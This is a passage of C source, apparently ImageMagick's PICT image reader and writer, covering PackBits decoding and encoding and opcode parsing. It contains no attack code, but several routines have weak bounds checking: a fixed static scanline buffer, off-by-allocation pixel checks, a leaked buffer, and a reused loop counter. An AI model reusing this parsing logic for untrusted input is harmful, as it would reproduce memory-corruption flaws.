/* 0x2b */ { "DHDVText", 0, "dh, dv (0..255), count (0..255), text" },
/* 0x2c */ { "reserved", -1, "reserved for Apple use" },
/* 0x2d */ { "reserved", -1, "reserved for Apple use" },
/* 0x2e */ { "reserved", -1, "reserved for Apple use" },
/* 0x2f */ { "reserved", -1, "reserved for Apple use" },
/* 0x30 */ { "frameRect", 8, "rect" },
/* 0x31 */ { "paintRect", 8, "rect" },
/* 0x32 */ { "eraseRect", 8, "rect" },
/* 0x33 */ { "invertRect", 8, "rect" },
/* 0x34 */ { "fillRect", 8, "rect" },
/* 0x35 */ { "reserved", 8, "reserved for Apple use" },
/* 0x36 */ { "reserved", 8, "reserved for Apple use" },
/* 0x37 */ { "reserved", 8, "reserved for Apple use" },
/* 0x38 */ { "frameSameRect", 0, "rect" },
/* 0x39 */ { "paintSameRect", 0, "rect" },
/* 0x3a */ { "eraseSameRect", 0, "rect" },
/* 0x3b */ { "invertSameRect", 0, "rect" },
/* 0x3c */ { "fillSameRect", 0, "rect" },
/* 0x3d */ { "reserved", 0, "reserved for Apple use" },
/* 0x3e */ { "reserved", 0, "reserved for Apple use" },
/* 0x3f */ { "reserved", 0, "reserved for Apple use" },
/* 0x40 */ { "frameRRect", 8, "rect" },
/* 0x41 */ { "paintRRect", 8, "rect" },
/* 0x42 */ { "eraseRRect", 8, "rect" },
/* 0x43 */ { "invertRRect", 8, "rect" },
/* 0x44 */ { "fillRRrect", 8, "rect" },
/* 0x45 */ { "reserved", 8, "reserved for Apple use" },
/* 0x46 */ { "reserved", 8, "reserved for Apple use" },
/* 0x47 */ { "reserved", 8, "reserved for Apple use" },
/* 0x48 */ { "frameSameRRect", 0, "rect" },
/* 0x49 */ { "paintSameRRect", 0, "rect" },
/* 0x4a */ { "eraseSameRRect", 0, "rect" },
/* 0x4b */ { "invertSameRRect", 0, "rect" },
/* 0x4c */ { "fillSameRRect", 0, "rect" },
/* 0x4d */ { "reserved", 0, "reserved for Apple use" },
/* 0x4e */ { "reserved", 0, "reserved for Apple use" },
/* 0x4f */ { "reserved", 0, "reserved for Apple use" },
/* 0x50 */ { "frameOval", 8, "rect" },
/* 0x51 */ { "paintOval", 8, "rect" },
/* 0x52 */ { "eraseOval", 8, "rect" },
/* 0x53 */ { "invertOval", 8, "rect" },
/* 0x54 */ { "fillOval", 8, "rect" },
/* 0x55 */ { "reserved", 8, "reserved for Apple use" },
/* 0x56 */ { "reserved", 8, "reserved for Apple use" },
/* 0x57 */ { "reserved", 8, "reserved for Apple use" },
/* 0x58 */ { "frameSameOval", 0, "rect" },
/* 0x59 */ { "paintSameOval", 0, "rect" },
/* 0x5a */ { "eraseSameOval", 0, "rect" },
/* 0x5b */ { "invertSameOval", 0, "rect" },
/* 0x5c */ { "fillSameOval", 0, "rect" },
/* 0x5d */ { "reserved", 0, "reserved for Apple use" },
/* 0x5e */ { "reserved", 0, "reserved for Apple use" },
/* 0x5f */ { "reserved", 0, "reserved for Apple use" },
/* 0x60 */ { "frameArc", 12, "rect, startAngle, arcAngle" },
/* 0x61 */ { "paintArc", 12, "rect, startAngle, arcAngle" },
/* 0x62 */ { "eraseArc", 12, "rect, startAngle, arcAngle" },
/* 0x63 */ { "invertArc", 12, "rect, startAngle, arcAngle" },
/* 0x64 */ { "fillArc", 12, "rect, startAngle, arcAngle" },
/* 0x65 */ { "reserved", 12, "reserved for Apple use" },
/* 0x66 */ { "reserved", 12, "reserved for Apple use" },
/* 0x67 */ { "reserved", 12, "reserved for Apple use" },
/* 0x68 */ { "frameSameArc", 4, "rect, startAngle, arcAngle" },
/* 0x69 */ { "paintSameArc", 4, "rect, startAngle, arcAngle" },
/* 0x6a */ { "eraseSameArc", 4, "rect, startAngle, arcAngle" },
/* 0x6b */ { "invertSameArc", 4, "rect, startAngle, arcAngle" },
/* 0x6c */ { "fillSameArc", 4, "rect, startAngle, arcAngle" },
/* 0x6d */ { "reserved", 4, "reserved for Apple use" },
/* 0x6e */ { "reserved", 4, "reserved for Apple use" },
/* 0x6f */ { "reserved", 4, "reserved for Apple use" },
/* 0x70 */ { "framePoly", 0, "poly" },
/* 0x71 */ { "paintPoly", 0, "poly" },
/* 0x72 */ { "erasePoly", 0, "poly" },
/* 0x73 */ { "invertPoly", 0, "poly" },
/* 0x74 */ { "fillPoly", 0, "poly" },
/* 0x75 */ { "reserved", 0, "reserved for Apple use" },
/* 0x76 */ { "reserved", 0, "reserved for Apple use" },
/* 0x77 */ { "reserved", 0, "reserved for Apple use" },
/* 0x78 */ { "frameSamePoly", 0, "poly (NYI)" },
/* 0x79 */ { "paintSamePoly", 0, "poly (NYI)" },
/* 0x7a */ { "eraseSamePoly", 0, "poly (NYI)" },
/* 0x7b */ { "invertSamePoly", 0, "poly (NYI)" },
/* 0x7c */ { "fillSamePoly", 0, "poly (NYI)" },
/* 0x7d */ { "reserved", 0, "reserved for Apple use" },
/* 0x7e */ { "reserved", 0, "reserved for Apple use" },
/* 0x7f */ { "reserved", 0, "reserved for Apple use" },
/* 0x80 */ { "frameRgn", 0, "region" },
/* 0x81 */ { "paintRgn", 0, "region" },
/* 0x82 */ { "eraseRgn", 0, "region" },
/* 0x83 */ { "invertRgn", 0, "region" },
/* 0x84 */ { "fillRgn", 0, "region" },
/* 0x85 */ { "reserved", 0, "reserved for Apple use" },
/* 0x86 */ { "reserved", 0, "reserved for Apple use" },
/* 0x87 */ { "reserved", 0, "reserved for Apple use" },
/* 0x88 */ { "frameSameRgn", 0, "region (NYI)" },
/* 0x89 */ { "paintSameRgn", 0, "region (NYI)" },
/* 0x8a */ { "eraseSameRgn", 0, "region (NYI)" },
/* 0x8b */ { "invertSameRgn", 0, "region (NYI)" },
/* 0x8c */ { "fillSameRgn", 0, "region (NYI)" },
/* 0x8d */ { "reserved", 0, "reserved for Apple use" },
/* 0x8e */ { "reserved", 0, "reserved for Apple use" },
/* 0x8f */ { "reserved", 0, "reserved for Apple use" },
/* 0x90 */ { "BitsRect", 0, "copybits, rect clipped" },
/* 0x91 */ { "BitsRgn", 0, "copybits, rgn clipped" },
/* 0x92 */ { "reserved", -1, "reserved for Apple use" },
/* 0x93 */ { "reserved", -1, "reserved for Apple use" },
/* 0x94 */ { "reserved", -1, "reserved for Apple use" },
/* 0x95 */ { "reserved", -1, "reserved for Apple use" },
/* 0x96 */ { "reserved", -1, "reserved for Apple use" },
/* 0x97 */ { "reserved", -1, "reserved for Apple use" },
/* 0x98 */ { "PackBitsRect", 0, "packed copybits, rect clipped" },
/* 0x99 */ { "PackBitsRgn", 0, "packed copybits, rgn clipped" },
/* 0x9a */ { "DirectBitsRect", 0, "PixMap, srcRect, dstRect, mode, PixData" },
/* 0x9b */ { "DirectBitsRgn", 0, "PixMap, srcRect, dstRect, mode, maskRgn, PixData" },
/* 0x9c */ { "reserved", -1, "reserved for Apple use" },
/* 0x9d */ { "reserved", -1, "reserved for Apple use" },
/* 0x9e */ { "reserved", -1, "reserved for Apple use" },
/* 0x9f */ { "reserved", -1, "reserved for Apple use" },
/* 0xa0 */ { "ShortComment", 2, "kind (word)" },
/* 0xa1 */ { "LongComment", 0, "kind (word), size (word), data" }
};
/*
Forward declarations.
*/
static MagickBooleanType
WritePICTImage(const ImageInfo *,Image *,ExceptionInfo *);
/*
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
% %
% %
% %
% D e c o d e I m a g e %
% %
% %
% %
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%
% DecodeImage decompresses an image via Macintosh pack bits decoding for
% Macintosh PICT images.
%
% The format of the DecodeImage method is:
%
% unsigned char *DecodeImage(Image *blob,Image *image,
% size_t bytes_per_line,const int bits_per_pixel,
% unsigned size_t extent)
%
% A description of each parameter follows:
%
% o image_info: the image info.
%
% o blob,image: the address of a structure of type Image.
%
% o bytes_per_line: This integer identifies the number of bytes in a
% scanline.
%
% o bits_per_pixel: the number of bits in a pixel.
%
% o extent: the number of pixels allocated.
%
*/
static unsigned char *ExpandBuffer(unsigned char *pixels,
MagickSizeType *bytes_per_line,const unsigned int bits_per_pixel)
{
register ssize_t
i;
register unsigned char
*p,
*q;
static unsigned char
scanline[8*256];
p=pixels;
q=scanline;
switch (bits_per_pixel)
{
case 8:
case 16:
case 32:
return(pixels);
case 4:
{
for (i=0; i < (ssize_t) *bytes_per_line; i++)
{
*q++=(*p >> 4) & 0xff;
*q++=(*p & 15);
p++;
}
*bytes_per_line*=2;
break;
}
case 2:
{
for (i=0; i < (ssize_t) *bytes_per_line; i++)
{
*q++=(*p >> 6) & 0x03;
*q++=(*p >> 4) & 0x03;
*q++=(*p >> 2) & 0x03;
*q++=(*p & 3);
p++;
}
*bytes_per_line*=4;
break;
}
case 1:
{
for (i=0; i < (ssize_t) *bytes_per_line; i++)
{
*q++=(*p >> 7) & 0x01;
*q++=(*p >> 6) & 0x01;
*q++=(*p >> 5) & 0x01;
*q++=(*p >> 4) & 0x01;
*q++=(*p >> 3) & 0x01;
*q++=(*p >> 2) & 0x01;
*q++=(*p >> 1) & 0x01;
*q++=(*p & 0x01);
p++;
}
*bytes_per_line*=8;
break;
}
default:
break;
}
return(scanline);
}
static unsigned char *DecodeImage(Image *blob,Image *image,
size_t bytes_per_line,const unsigned int bits_per_pixel,size_t *extent,
ExceptionInfo *exception)
{
MagickSizeType
number_pixels;
register ssize_t
i;
register unsigned char
*p,
*q;
size_t
bytes_per_pixel,
length,
row_bytes,
scanline_length,
width;
ssize_t
count,
j,
y;
unsigned char
*pixels,
*scanline;
/*
Determine pixel buffer size.
*/
if (bits_per_pixel <= 8)
bytes_per_line&=0x7fff;
width=image->columns;
bytes_per_pixel=1;
if (bits_per_pixel == 16)
{
bytes_per_pixel=2;
width*=2;
}
else
if (bits_per_pixel == 32)
width*=image->alpha_trait ? 4 : 3;
if (bytes_per_line == 0)
bytes_per_line=width;
row_bytes=(size_t) (image->columns | 0x8000);
if (image->storage_class == DirectClass)
row_bytes=(size_t) ((4*image->columns) | 0x8000);
/*
Allocate pixel and scanline buffer.
*/
pixels=(unsigned char *) AcquireQuantumMemory(image->rows,row_bytes*
sizeof(*pixels));
if (pixels == (unsigned char *) NULL)
return((unsigned char *) NULL);
*extent=row_bytes*image->rows*sizeof(*pixels);
(void) ResetMagickMemory(pixels,0,*extent);
scanline=(unsigned char *) AcquireQuantumMemory(row_bytes,2*
sizeof(*scanline));
if (scanline == (unsigned char *) NULL)
return((unsigned char *) NULL);
if (bytes_per_line < 8)
{
/*
Pixels are already uncompressed.
*/
for (y=0; y < (ssize_t) image->rows; y++)
{
q=pixels+y*width*GetPixelChannels(image);;
number_pixels=bytes_per_line;
count=ReadBlob(blob,(size_t) number_pixels,scanline);
if (count != (ssize_t) number_pixels)
{
(void) ThrowMagickException(exception,GetMagickModule(),
CorruptImageError,"UnableToUncompressImage","`%s'",
image->filename);
break;
}
p=ExpandBuffer(scanline,&number_pixels,bits_per_pixel);
if ((q+number_pixels) > (pixels+(*extent)))
{
(void) ThrowMagickException(exception,GetMagickModule(),
CorruptImageError,"UnableToUncompressImage","`%s'",
image->filename);
break;
}
(void) CopyMagickMemory(q,p,(size_t) number_pixels);
}
scanline=(unsigned char *) RelinquishMagickMemory(scanline);
return(pixels);
}
/*
Uncompress RLE pixels into uncompressed pixel buffer.
*/
for (y=0; y < (ssize_t) image->rows; y++)
{
q=pixels+y*width;
if (bytes_per_line > 200)
scanline_length=ReadBlobMSBShort(blob);
else
scanline_length=1UL*ReadBlobByte(blob);
if (scanline_length >= row_bytes)
{
(void) ThrowMagickException(exception,GetMagickModule(),
CorruptImageError,"UnableToUncompressImage","`%s'",image->filename);
break;
}
count=ReadBlob(blob,scanline_length,scanline);
if (count != (ssize_t) scanline_length)
{
(void) ThrowMagickException(exception,GetMagickModule(),
CorruptImageError,"UnableToUncompressImage","`%s'",image->filename);
break;
}
for (j=0; j < (ssize_t) scanline_length; )
if ((scanline[j] & 0x80) == 0)
{
length=(size_t) ((scanline[j] & 0xff)+1);
number_pixels=length*bytes_per_pixel;
p=ExpandBuffer(scanline+j+1,&number_pixels,bits_per_pixel);
if ((q-pixels+number_pixels) <= *extent)
(void) CopyMagickMemory(q,p,(size_t) number_pixels);
q+=number_pixels;
j+=(ssize_t) (length*bytes_per_pixel+1);
}
else
{
length=(size_t) (((scanline[j] ^ 0xff) & 0xff)+2);
number_pixels=bytes_per_pixel;
p=ExpandBuffer(scanline+j+1,&number_pixels,bits_per_pixel);
for (i=0; i < (ssize_t) length; i++)
{
if ((q-pixels+number_pixels) <= *extent)
(void) CopyMagickMemory(q,p,(size_t) number_pixels);
q+=number_pixels;
}
j+=(ssize_t) bytes_per_pixel+1;
}
}
scanline=(unsigned char *) RelinquishMagickMemory(scanline);
return(pixels);
}
/*
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
% %
% %
% %
% E n c o d e I m a g e %
% %
% %
% %
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%
% EncodeImage compresses an image via Macintosh pack bits encoding
% for Macintosh PICT images.
%
% The format of the EncodeImage method is:
%
% size_t EncodeImage(Image *image,const unsigned char *scanline,
% const size_t bytes_per_line,unsigned char *pixels)
%
% A description of each parameter follows:
%
% o image: the address of a structure of type Image.
%
% o scanline: A pointer to an array of characters to pack.
%
% o bytes_per_line: the number of bytes in a scanline.
%
% o pixels: A pointer to an array of characters where the packed
% characters are stored.
%
*/
static size_t EncodeImage(Image *image,const unsigned char *scanline,
const size_t bytes_per_line,unsigned char *pixels)
{
#define MaxCount 128
#define MaxPackbitsRunlength 128
register const unsigned char
*p;
register ssize_t
i;
register unsigned char
*q;
size_t
length;
ssize_t
count,
repeat_count,
runlength;
unsigned char
index;
/*
Pack scanline.
*/
assert(image != (Image *) NULL);
assert(image->signature == MagickSignature);
if (image->debug != MagickFalse)
(void) LogMagickEvent(TraceEvent,GetMagickModule(),"%s",image->filename);
assert(scanline != (unsigned char *) NULL);
assert(pixels != (unsigned char *) NULL);
count=0;
runlength=0;
p=scanline+(bytes_per_line-1);
q=pixels;
index=(*p);
for (i=(ssize_t) bytes_per_line-1; i >= 0; i--)
{
if (index == *p)
runlength++;
else
{
if (runlength < 3)
while (runlength > 0)
{
*q++=(unsigned char) index;
runlength--;
count++;
if (count == MaxCount)
{
*q++=(unsigned char) (MaxCount-1);
count-=MaxCount;
}
}
else
{
if (count > 0)
*q++=(unsigned char) (count-1);
count=0;
while (runlength > 0)
{
repeat_count=runlength;
if (repeat_count > MaxPackbitsRunlength)
repeat_count=MaxPackbitsRunlength;
*q++=(unsigned char) index;
*q++=(unsigned char) (257-repeat_count);
runlength-=repeat_count;
}
}
runlength=1;
}
index=(*p);
p--;
}
if (runlength < 3)
while (runlength > 0)
{
*q++=(unsigned char) index;
runlength--;
count++;
if (count == MaxCount)
{
*q++=(unsigned char) (MaxCount-1);
count-=MaxCount;
}
}
else
{
if (count > 0)
*q++=(unsigned char) (count-1);
count=0;
while (runlength > 0)
{
repeat_count=runlength;
if (repeat_count > MaxPackbitsRunlength)
repeat_count=MaxPackbitsRunlength;
*q++=(unsigned char) index;
*q++=(unsigned char) (257-repeat_count);
runlength-=repeat_count;
}
}
if (count > 0)
*q++=(unsigned char) (count-1);
/*
Write the number of and the packed length.
*/
length=(size_t) (q-pixels);
if (bytes_per_line > 200)
{
(void) WriteBlobMSBShort(image,(unsigned short) length);
length+=2;
}
else
{
(void) WriteBlobByte(image,(unsigned char) length);
length++;
}
while (q != pixels)
{
q--;
(void) WriteBlobByte(image,*q);
}
return(length);
}
/*
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
% %
% %
% %
% I s P I C T %
% %
% %
% %
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%
% IsPICT()() returns MagickTrue if the image format type, identified by the
% magick string, is PICT.
%
% The format of the ReadPICTImage method is:
%
% MagickBooleanType IsPICT(const unsigned char *magick,const size_t length)
%
% A description of each parameter follows:
%
% o magick: compare image format pattern against these bytes.
%
% o length: Specifies the length of the magick string.
%
*/
static MagickBooleanType IsPICT(const unsigned char *magick,const size_t length)
{
if (length < 12)
return(MagickFalse);
/*
Embedded OLE2 macintosh have "PICT" instead of 512 platform header.
*/
if (memcmp(magick,"PICT",4) == 0)
return(MagickTrue);
if (length < 528)
return(MagickFalse);
if (memcmp(magick+522,"\000\021\002\377\014\000",6) == 0)
return(MagickTrue);
return(MagickFalse);
}
#if !defined(macintosh)
/*
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
% %
% %
% %
% R e a d P I C T I m a g e %
% %
% %
% %
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%
% ReadPICTImage() reads an Apple Macintosh QuickDraw/PICT image file
% and returns it. It allocates the memory necessary for the new Image
% structure and returns a pointer to the new image.
%
% The format of the ReadPICTImage method is:
%
% Image *ReadPICTImage(const ImageInfo *image_info,
% ExceptionInfo *exception)
%
% A description of each parameter follows:
%
% o image_info: the image info.
%
% o exception: return any errors or warnings in this structure.
%
*/
static MagickBooleanType ReadRectangle(Image *image,PICTRectangle *rectangle)
{
rectangle->top=(short) ReadBlobMSBShort(image);
rectangle->left=(short) ReadBlobMSBShort(image);
rectangle->bottom=(short) ReadBlobMSBShort(image);
rectangle->right=(short) ReadBlobMSBShort(image);
if ((EOFBlob(image) != MagickFalse) || (rectangle->left > rectangle->right) ||
(rectangle->top > rectangle->bottom))
return(MagickFalse);
return(MagickTrue);
}
static Image *ReadPICTImage(const ImageInfo *image_info,
ExceptionInfo *exception)
{
char
geometry[MagickPathExtent],
header_ole[4];
Image
*image;
int
c,
code;
MagickBooleanType
jpeg,
status;
PICTRectangle
frame;
PICTPixmap
pixmap;
Quantum
index;
register Quantum
*q;
register ssize_t
i,
x;
size_t
extent,
length;
ssize_t
count,
flags,
j,
version,
y;
StringInfo
*profile;
/*
Open image file.
*/
assert(image_info != (const ImageInfo *) NULL);
assert(image_info->signature == MagickSignature);
if (image_info->debug != MagickFalse)
(void) LogMagickEvent(TraceEvent,GetMagickModule(),"%s",
image_info->filename);
assert(exception != (ExceptionInfo *) NULL);
assert(exception->signature == MagickSignature);
image=AcquireImage(image_info,exception);
status=OpenBlob(image_info,image,ReadBinaryBlobMode,exception);
if (status == MagickFalse)
{
image=DestroyImageList(image);
return((Image *) NULL);
}
/*
Read PICT header.
*/
pixmap.bits_per_pixel=0;
pixmap.component_count=0;
/*
Skip header : 512 for standard PICT and 4, ie "PICT" for OLE2.
*/
header_ole[0]=ReadBlobByte(image);
header_ole[1]=ReadBlobByte(image);
header_ole[2]=ReadBlobByte(image);
header_ole[3]=ReadBlobByte(image);
if (!((header_ole[0] == 0x50) && (header_ole[1] == 0x49) &&
(header_ole[2] == 0x43) && (header_ole[3] == 0x54 )))
for (i=0; i < 508; i++)
if (ReadBlobByte(image) == EOF)
break;
(void) ReadBlobMSBShort(image); /* skip picture size */
if (ReadRectangle(image,&frame) == MagickFalse)
ThrowReaderException(CorruptImageError,"ImproperImageHeader");
while ((c=ReadBlobByte(image)) == 0) ;
if (c != 0x11)
ThrowReaderException(CorruptImageError,"ImproperImageHeader");
version=ReadBlobByte(image);
if (version == 2)
{
c=ReadBlobByte(image);
if (c != 0xff)
ThrowReaderException(CorruptImageError,"ImproperImageHeader");
}
else
if (version != 1)
ThrowReaderException(CorruptImageError,"ImproperImageHeader");
if ((frame.left < 0) || (frame.right < 0) || (frame.top < 0) ||
(frame.bottom < 0) || (frame.left >= frame.right) ||
(frame.top >= frame.bottom))
ThrowReaderException(CorruptImageError,"ImproperImageHeader");
/*
Create black canvas.
*/
flags=0;
image->depth=8;
image->columns=1UL*(frame.right-frame.left);
image->rows=1UL*(frame.bottom-frame.top);
image->resolution.x=DefaultResolution;
image->resolution.y=DefaultResolution;
image->units=UndefinedResolution;
if ((image_info->ping != MagickFalse) && (image_info->number_scenes != 0))
if (image->scene >= (image_info->scene+image_info->number_scenes-1))
{
(void) CloseBlob(image);
return(GetFirstImageInList(image));
}
status=SetImageExtent(image,image->columns,image->rows,exception);
if (status == MagickFalse)
return(DestroyImageList(image));
/*
Interpret PICT opcodes.
*/
jpeg=MagickFalse;
for (code=0; EOFBlob(image) == MagickFalse; )
{
if ((image_info->ping != MagickFalse) && (image_info->number_scenes != 0))
if (image->scene >= (image_info->scene+image_info->number_scenes-1))
break;
if ((version == 1) || ((TellBlob(image) % 2) != 0))
code=ReadBlobByte(image);
if (version == 2)
code=(int) ReadBlobMSBShort(image);
if (code < 0)
break;
if (code > 0xa1)
{
if (image->debug != MagickFalse)
(void) LogMagickEvent(CoderEvent,GetMagickModule(),"%04X:",code);
}
else
{
if (image->debug != MagickFalse)
(void) LogMagickEvent(CoderEvent,GetMagickModule(),
" %04X %s: %s",code,codes[code].name,codes[code].description);
switch (code)
{
case 0x01:
{
/*
Clipping rectangle.
*/
length=ReadBlobMSBShort(image);
if (length != 0x000a)
{
for (i=0; i < (ssize_t) (length-2); i++)
if (ReadBlobByte(image) == EOF)
break;
break;
}
if (ReadRectangle(image,&frame) == MagickFalse)
ThrowReaderException(CorruptImageError,"ImproperImageHeader");
if (((frame.left & 0x8000) != 0) || ((frame.top & 0x8000) != 0))
break;
image->columns=1UL*(frame.right-frame.left);
image->rows=1UL*(frame.bottom-frame.top);
(void) SetImageBackgroundColor(image,exception);
break;
}
case 0x12:
case 0x13:
case 0x14:
{
ssize_t
pattern;
size_t
height,
width;
/*
Skip pattern definition.
*/
pattern=1L*ReadBlobMSBShort(image);
for (i=0; i < 8; i++)
if (ReadBlobByte(image) == EOF)
break;
if (pattern == 2)
{
for (i=0; i < 5; i++)
if (ReadBlobByte(image) == EOF)
break;
break;
}
if (pattern != 1)
ThrowReaderException(CorruptImageError,"UnknownPatternType");
length=ReadBlobMSBShort(image);
if (ReadRectangle(image,&frame) == MagickFalse)
ThrowReaderException(CorruptImageError,"ImproperImageHeader");
ReadPixmap(pixmap);
image->depth=1UL*pixmap.component_size;
image->resolution.x=1.0*pixmap.horizontal_resolution;
image->resolution.y=1.0*pixmap.vertical_resolution;
image->units=PixelsPerInchResolution;
(void) ReadBlobMSBLong(image);
flags=1L*ReadBlobMSBShort(image);
length=ReadBlobMSBShort(image);
for (i=0; i <= (ssize_t) length; i++)
(void) ReadBlobMSBLong(image);
width=1UL*(frame.bottom-frame.top);
height=1UL*(frame.right-frame.left);
if (pixmap.bits_per_pixel <= 8)
length&=0x7fff;
if (pixmap.bits_per_pixel == 16)
width<<=1;
if (length == 0)
length=width;
if (length < 8)
{
for (i=0; i < (ssize_t) (length*height); i++)
if (ReadBlobByte(image) == EOF)
break;
}
else
for (j=0; j < (int) height; j++)
if (length > 200)
{
for (j=0; j < (ssize_t) ReadBlobMSBShort(image); j++)
if (ReadBlobByte(image) == EOF)
break;
}
else
for (j=0; j < (ssize_t) ReadBlobByte(image); j++)
if (ReadBlobByte(image) == EOF)
break;
break;
}
case 0x1b:
{
/*
Initialize image background color.
*/
image->background_color.red=(Quantum)
ScaleShortToQuantum(ReadBlobMSBShort(image));
image->background_color.green=(Quantum)
ScaleShortToQuantum(ReadBlobMSBShort(image));
image->background_color.blue=(Quantum)
ScaleShortToQuantum(ReadBlobMSBShort(image));
break;
}
case 0x70:
case 0x71:
case 0x72:
case 0x73:
case 0x74:
case 0x75:
case 0x76:
case 0x77:
{
/*
Skip polygon or region.
*/
length=ReadBlobMSBShort(image);
for (i=0; i < (ssize_t) (length-2); i++)
if (ReadBlobByte(image) == EOF)
break;
break;
}
case 0x90:
case 0x91:
case 0x98:
case 0x99:
case 0x9a:
case 0x9b:
{
Image
*tile_image;
PICTRectangle
source,
destination;
register unsigned char
*p;
size_t
j;
ssize_t
bytes_per_line;
unsigned char
*pixels;
/*
Pixmap clipped by a rectangle.
*/
bytes_per_line=0;
if ((code != 0x9a) && (code != 0x9b))
bytes_per_line=1L*ReadBlobMSBShort(image);
else
{
(void) ReadBlobMSBShort(image);
(void) ReadBlobMSBShort(image);
(void) ReadBlobMSBShort(image);
}
if (ReadRectangle(image,&frame) == MagickFalse)
ThrowReaderException(CorruptImageError,"ImproperImageHeader");
/*
Initialize tile image.
*/
tile_image=CloneImage(image,1UL*(frame.right-frame.left),
1UL*(frame.bottom-frame.top),MagickTrue,exception);
if (tile_image == (Image *) NULL)
return((Image *) NULL);
if ((code == 0x9a) || (code == 0x9b) ||
((bytes_per_line & 0x8000) != 0))
{
ReadPixmap(pixmap);
tile_image->depth=1UL*pixmap.component_size;
tile_image->alpha_trait=pixmap.component_count == 4 ?
BlendPixelTrait : UndefinedPixelTrait;
tile_image->resolution.x=(double) pixmap.horizontal_resolution;
tile_image->resolution.y=(double) pixmap.vertical_resolution;
tile_image->units=PixelsPerInchResolution;
if (tile_image->alpha_trait != UndefinedPixelTrait)
image->alpha_trait=tile_image->alpha_trait;
}
if ((code != 0x9a) && (code != 0x9b))
{
/*
Initialize colormap.
*/
tile_image->colors=2;
if ((bytes_per_line & 0x8000) != 0)
{
(void) ReadBlobMSBLong(image);
flags=1L*ReadBlobMSBShort(image);
tile_image->colors=1UL*ReadBlobMSBShort(image)+1;
}
status=AcquireImageColormap(tile_image,tile_image->colors,
exception);
if (status == MagickFalse)
{
tile_image=DestroyImage(tile_image);
ThrowReaderException(ResourceLimitError,
"MemoryAllocationFailed");
}
if ((bytes_per_line & 0x8000) != 0)
{
for (i=0; i < (ssize_t) tile_image->colors; i++)
{
j=ReadBlobMSBShort(image) % tile_image->colors;
if ((flags & 0x8000) != 0)
j=(size_t) i;
tile_image->colormap[j].red=(Quantum)
ScaleShortToQuantum(ReadBlobMSBShort(image));
tile_image->colormap[j].green=(Quantum)
ScaleShortToQuantum(ReadBlobMSBShort(image));
tile_image->colormap[j].blue=(Quantum)
ScaleShortToQuantum(ReadBlobMSBShort(image));
}
}
else
{
for (i=0; i < (ssize_t) tile_image->colors; i++)
{
tile_image->colormap[i].red=(Quantum) (QuantumRange-
tile_image->colormap[i].red);
tile_image->colormap[i].green=(Quantum) (QuantumRange-
tile_image->colormap[i].green);
tile_image->colormap[i].blue=(Quantum) (QuantumRange-
tile_image->colormap[i].blue);
}
}
}
if (ReadRectangle(image,&source) == MagickFalse)
ThrowReaderException(CorruptImageError,"ImproperImageHeader");
if (ReadRectangle(image,&destination) == MagickFalse)
ThrowReaderException(CorruptImageError,"ImproperImageHeader");
(void) ReadBlobMSBShort(image);
if ((code == 0x91) || (code == 0x99) || (code == 0x9b))
{
/*
Skip region.
*/
length=ReadBlobMSBShort(image);
for (i=0; i < (ssize_t) (length-2); i++)
if (ReadBlobByte(image) == EOF)
break;
}
if ((code != 0x9a) && (code != 0x9b) &&
(bytes_per_line & 0x8000) == 0)
pixels=DecodeImage(image,tile_image,1UL*bytes_per_line,1,&extent,
exception);
else
pixels=DecodeImage(image,tile_image,1UL*bytes_per_line,1U*
pixmap.bits_per_pixel,&extent,exception);
if (pixels == (unsigned char *) NULL)
{
tile_image=DestroyImage(tile_image);
ThrowReaderException(ResourceLimitError,
"MemoryAllocationFailed");
}
/*
Convert PICT tile image to pixel packets.
*/
p=pixels;
for (y=0; y < (ssize_t) tile_image->rows; y++)
{
if (p > (pixels+extent+image->columns))
ThrowReaderException(CorruptImageError,"NotEnoughPixelData");
q=QueueAuthenticPixels(tile_image,0,y,tile_image->columns,1,
exception);
if (q == (Quantum *) NULL)
break;
for (x=0; x < (ssize_t) tile_image->columns; x++)
{
if (tile_image->storage_class == PseudoClass)
{
index=ConstrainColormapIndex(tile_image,*p,exception);
SetPixelIndex(tile_image,index,q);
SetPixelRed(tile_image,
tile_image->colormap[(ssize_t) index].red,q);
SetPixelGreen(tile_image,
tile_image->colormap[(ssize_t) index].green,q);
SetPixelBlue(tile_image,
tile_image->colormap[(ssize_t) index].blue,q);
}
else
{
if (pixmap.bits_per_pixel == 16)
{
i=(*p++);
j=(*p);
SetPixelRed(tile_image,ScaleCharToQuantum(
(unsigned char) ((i & 0x7c) << 1)),q);
SetPixelGreen(tile_image,ScaleCharToQuantum(
(unsigned char) (((i & 0x03) << 6) |
((j & 0xe0) >> 2))),q);
SetPixelBlue(tile_image,ScaleCharToQuantum(
(unsigned char) ((j & 0x1f) << 3)),q);
}
else
if (tile_image->alpha_trait == UndefinedPixelTrait)
{
if (p > (pixels+extent+2*image->columns))
ThrowReaderException(CorruptImageError,
"NotEnoughPixelData");
SetPixelRed(tile_image,ScaleCharToQuantum(*p),q);
SetPixelGreen(tile_image,ScaleCharToQuantum(
*(p+tile_image->columns)),q);
SetPixelBlue(tile_image,ScaleCharToQuantum(
*(p+2*tile_image->columns)),q);
}
else
{
if (p > (pixels+extent+3*image->columns))
ThrowReaderException(CorruptImageError,
"NotEnoughPixelData");
SetPixelAlpha(tile_image,ScaleCharToQuantum(*p),q);
SetPixelRed(tile_image,ScaleCharToQuantum(
*(p+tile_image->columns)),q);
SetPixelGreen(tile_image,ScaleCharToQuantum(
*(p+2*tile_image->columns)),q);
